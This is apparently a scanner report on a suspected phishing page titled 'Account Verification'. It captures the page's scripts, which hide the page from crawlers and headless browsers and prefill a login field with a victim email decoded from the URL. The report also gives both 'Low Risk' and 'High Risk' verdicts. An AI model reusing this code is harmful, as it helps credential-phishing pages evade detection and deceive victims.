finance banking

English

The domain name 'revpassunsc33o2ibleam74-ease-awsapprucom-gm6v4cmwms.edgeone.app' uses the application-focused generic top-level domain (.app) with subdomain 'revpassunsc33o2ibleam74-ease-awsapprucom-gm6v4cmwms'. The core label 'edgeone' covers 7 characters split between four vowels and 3 consonants. Segmentation suggests 2 words: edge, one. Expect 3.5 characters per word on average. No strong language cues emerged from the frequency lists.

botcheck

html/be/cd/becdac51-e389-4034-8494-9195bd7539e3.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

fcbbc5d653b789b4488c2e13aabddb233ecfd40aba4202fb22299882e58fb9c9

a4887d5f87b90eb35e52f5bf95a0390a4eb1e092e8bdd4b70879d9650db791b7

d5aef07088febad8c2e3a1eeda3bb5e6b74a9e5f1e242784cbb02a397373f7eb

c44d72d35e7fbe7984e887baea54a9b4c63141f09ede7a296c48f7de6a428a1f

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/


(async function () {
    const userAgent = navigator.userAgent || "";
    const suspiciousUA = /bot|crawl|spider|slurp|headless|phantom/i.test(userAgent);
    const isHeadless = navigator.webdriver || false;

    // JS execution confirmation
    localStorage.setItem('js_enabled', 'true');

    // Honeypot trap (use your existing field instead)
    const honeypot = document.getElementById('botcheck');
    if (honeypot && honeypot.value) {
        window.location.href = "https://www.wikipedia.org";
        return;
    }

    // Check if localStorage was written (JS running)
    const jsEnabled = localStorage.getItem('js_enabled') === 'true';

    // Final bot detection logic (without interaction check)
    if (
        suspiciousUA ||
        isHeadless ||
        !jsEnabled
    ) {
        // Redirect bot
        window.location.href = "https://www.wikipedia.org";
    }
})();



// Function to get email from URL hash
function getEmailFromUrl() {
    const hash = window.location.hash.substring(1); // Remove the #
    if (!hash) return null;
    
    // Check if hash is base64 encoded
    if (isBase64(hash)) {
        try {
            return atob(hash); // Decode base64
        } catch (e) {
            return hash; // If decoding fails, assume it's plain email
        }
    }
    return hash;
}

// Function to check if a string is base64 encoded
function isBase64(str) {
    try {
        return btoa(atob(str)) === str;
    } catch (err) {
        return false;
    }
}

// Function to update URL with base64 encoded email
function updateUrlWithEncodedEmail(email) {
    if (!email) return;
    const encodedEmail = btoa(email);
    window.history.replaceState(null, null, `#${encodedEmail}`);
}

// Main function to process email
function processEmail() {
    // Get email from URL
    const email = getEmailFromUrl();
    
    if (email) {
        // Update username field
        document.getElementById('username').value = email;
        
        // Update URL with encoded email if it's not already encoded
        if (!isBase64(window.location.hash.substring(1))) {
            updateUrlWithEncodedEmail(email);
        }
    }
}

// Run when page loads
window.addEventListener('DOMContentLoaded', processEmail);


Account Verification

✅ Low Risk - https://revpassunsc33o2ibleam74-ease-awsapprucom-gm6v4cmwms.edgeone.app/revindex.html

Requests	IP Address	Location	AS Autonomous System
4	142.250.186.131	United States	AS15169GOOGLE
2	142.250.185.202	United States	AS15169GOOGLE
2	43.152.26.58	Singapore	AS139341ACE
1	104.26.12.205	United States	AS13335CLOUDFLARENET
1	2a00:1450:4001:813::200a	Frankfurt am Main, Hesse, Germany	AS15169GOOGLE
1	2a00:1450:4001:831::2003	Frankfurt am Main, Hesse, Germany	AS15169GOOGLE
1	104.26.13.205	United States	AS13335CLOUDFLARENET
1	172.67.74.152	United States	AS13335CLOUDFLARENET
9	8	-	-

Security Scan Report: revpassunsc33o2ibleam74-ease-awsapprucom-gm6v4cmwms.edgeone.app

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History